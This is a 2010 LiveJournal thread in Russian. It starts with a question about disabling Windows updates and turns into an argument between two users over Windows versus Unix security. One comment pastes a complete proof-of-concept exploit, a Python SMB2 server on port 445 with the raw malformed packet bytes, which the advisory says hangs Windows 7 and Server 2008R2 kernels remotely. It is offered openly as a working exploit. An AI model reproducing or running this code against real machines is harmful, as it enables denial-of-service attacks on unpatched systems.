Отменить закачку обновлений.

Jan. 16th, 2010 07:44 pm
[identity profile] navarskaj.livejournal.com posting in [community profile] useful_faq
Хочу отменить закачку бесконечных обновлений для виндоуса (лицензионный). Чего будет?
Где снять галочку? Как это сделать?
Спасибо.
  • Add Memory
  • Share This Entry
Flat | Top-Level Comments Only

Date: 2010-01-17 01:32 am (UTC)
From: [identity profile] a1q1.livejournal.com
I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Date: 2010-01-17 06:55 am (UTC)
From: [identity profile] shurikh.livejournal.com
я не говорил про серверные применения. как десктоп - винда незаменима. это раз. а два - в никсах и бсд на поверку дыр не меньше.

Date: 2010-01-17 10:55 pm (UTC)
From: [identity profile] a1q1.livejournal.com
меньше гораздо, даже больше скажу, их нет.
можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка )
могу показать где искать , например тут http://www.securityfocus.com
а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)

Date: 2010-01-18 11:02 am (UTC)
From: [identity profile] shurikh.livejournal.com
что такое "сама система"? голое ядро с tcp/ip стеком, или вообще голое ядро? а что такое ядро, когда в него встроены как минимум дрова? и кому оно нужно без всего остального? и я уже перечислял специфичный софт, которого ПРОСТО НЕТ на *nix-ах. Добавлю до кучи Nikon Caprure NX, который нужен для нормальной проявки .NEF файлов. Нормальной, качественной, а не той, которая не видит половину метаданных (я про dcraw и его front-end'ы в курсе, спасибо, кушайте сами).

Date: 2010-01-18 12:05 pm (UTC)
From: [identity profile] a1q1.livejournal.com
что такое "сама система" - базовая система.
спец софта вот нет для меня на винде. например вот для робота который у нас в конторе чистит днища кораблей. дрова есть под никсы:) оставте свою предвзятость. бо я вам тоже могу список софта выкатить, который вы ненайдёте под вынь. ваш разговор на уровне 16тилетнего ребёнка.

Date: 2010-01-18 12:34 pm (UTC)
From: [identity profile] shurikh.livejournal.com
>бо я вам тоже могу список софта выкатить
выкатите. я говорю про настольный софт.

>вы лучше по существу ответте, что делать с виннюкой
я не спец по администрированию серверов, речь шла про настольные системы. мне лично наплевать, есть у моего рабочего компа на Windows 7 эта уязвимость или нет. о черверах речь не шла изначально, я писал про дескотпы, о чем неоднократно напоминал.

>ваш разговор на уровне 16тилетнего ребёнка
а разговор ваш, с "хомячками", "ленивыми идиотами" и прочими оборотами, на уровне взрослого мужа, да? у нас весь разговор изначально пошел по принципу "сам дурак" :)

Date: 2010-01-18 12:41 pm (UTC)
From: [identity profile] a1q1.livejournal.com
разговор начался о критических уязвимостях. вот пруф линки вё от вас жду. от меня пруфлинк на например виннюку вы получили, даже сам эксплойт рабочий. от вас пока только слова и непонятные сравнения тёплого с мягким, некому не интересные.

Date: 2010-01-18 12:52 pm (UTC)
From: [identity profile] shurikh.livejournal.com
да не говорил я с вами о крит уязвимостях серверов. я изначально писал про то, что *никсы для десктопного рабочего места или домашнего компа не сильно подходят, а вы слюной бразгыть начали и кирпичи высирать... говорить с вами не о чем, я вам про фому, вы мне про свою виннуку, на вопросы отвечаете цитатами выдранными из первых результатов поисков гугла (это я про граф просмотрщики), хотя гуглом я сам пользоваться умею.

Date: 2010-01-18 12:46 pm (UTC)
From: [identity profile] a1q1.livejournal.com
а с чего вы взяли что виннюка это исключительно беда серверов? вин7 что серверная ось? а виннюкой положить 7ку на раз два:))

Date: 2010-01-18 01:01 pm (UTC)
From: [identity profile] shurikh.livejournal.com
а кому надо её класть? где массовые атаки? в чем суперсрочность исправления именно этой ошибки? да, это крит, он позволяет подвешать систему, а не рута в ней получить, или код через дырку ДНС выполнить.

Date: 2010-01-18 01:30 pm (UTC)
From: [identity profile] a1q1.livejournal.com
а ну т.е. в офисах или домашних сетях клиенты юзеров, которые завязаны на самбе это фигня. ну ясно всё с вами.

Date: 2010-01-18 02:10 pm (UTC)
From: [identity profile] shurikh.livejournal.com
нормальные офисы за брандмауэром находятся, атаки внутри? да кому это надо... в конце концов придет админ и даст экспериментатору по шапке. домашние сети? еще раз, где эпидемии атак? если бы атаки были реальной угрозой - дырку бы заделали, невелика сложность.

Date: 2010-01-18 02:21 pm (UTC)
From: [identity profile] a1q1.livejournal.com
ну не могут они её заделать, не могут, пора бы уже вам смерица с этим.
ms вообще ничего не делает последние несколько лет, голый маркетинг. за 5 лет даже ядро не написали. и в 7ку воткнули старое от висты:)
вы и вправду думаете, что в продакшен можно ставить систему вот с такой вот дыркой нелепой? а какие вы эпидемии хотите? дырка эта опасна, ms ничего не делает. как бы это говорит само за себя.

Date: 2010-01-18 12:07 pm (UTC)
From: [identity profile] a1q1.livejournal.com
вы лучше по существу ответте, что делать с виннюкой? это то с чего начался разговор. но вы начали какие то децкие отмазки, что это вовсе не важная уязвимость и чинить не нужно.

Date: 2010-01-18 09:54 pm (UTC)
From: [identity profile] shurikh.livejournal.com
порты блокировать, что еще-то.

Date: 2010-01-18 10:03 pm (UTC)
From: [identity profile] a1q1.livejournal.com
т.е. чинить уязвимость это как то не ваш путь да? проще выкинуть нафиг чем чинить да?

Date: 2010-01-18 10:10 pm (UTC)
From: [identity profile] shurikh.livejournal.com
не я пишу windows. ты спросила "что делать", я предложил вариант. да, а зачем самбовским портам торчать наружу? я ж не админ, я не в курсах, может действительно нужно, и даже дома, на домашних компах?

Date: 2010-01-18 10:13 pm (UTC)
From: [identity profile] a1q1.livejournal.com
ну мной самба выкинута давно:) есть другие способы более интересные. увы венде не доступные. ну не понимает винда zfs увы линукс тоже:)

Date: 2010-01-18 10:15 pm (UTC)
From: [identity profile] shurikh.livejournal.com
с чем и поздравляю
  • Add Memory
  • Share This Entry
Flat | Top-Level Comments Only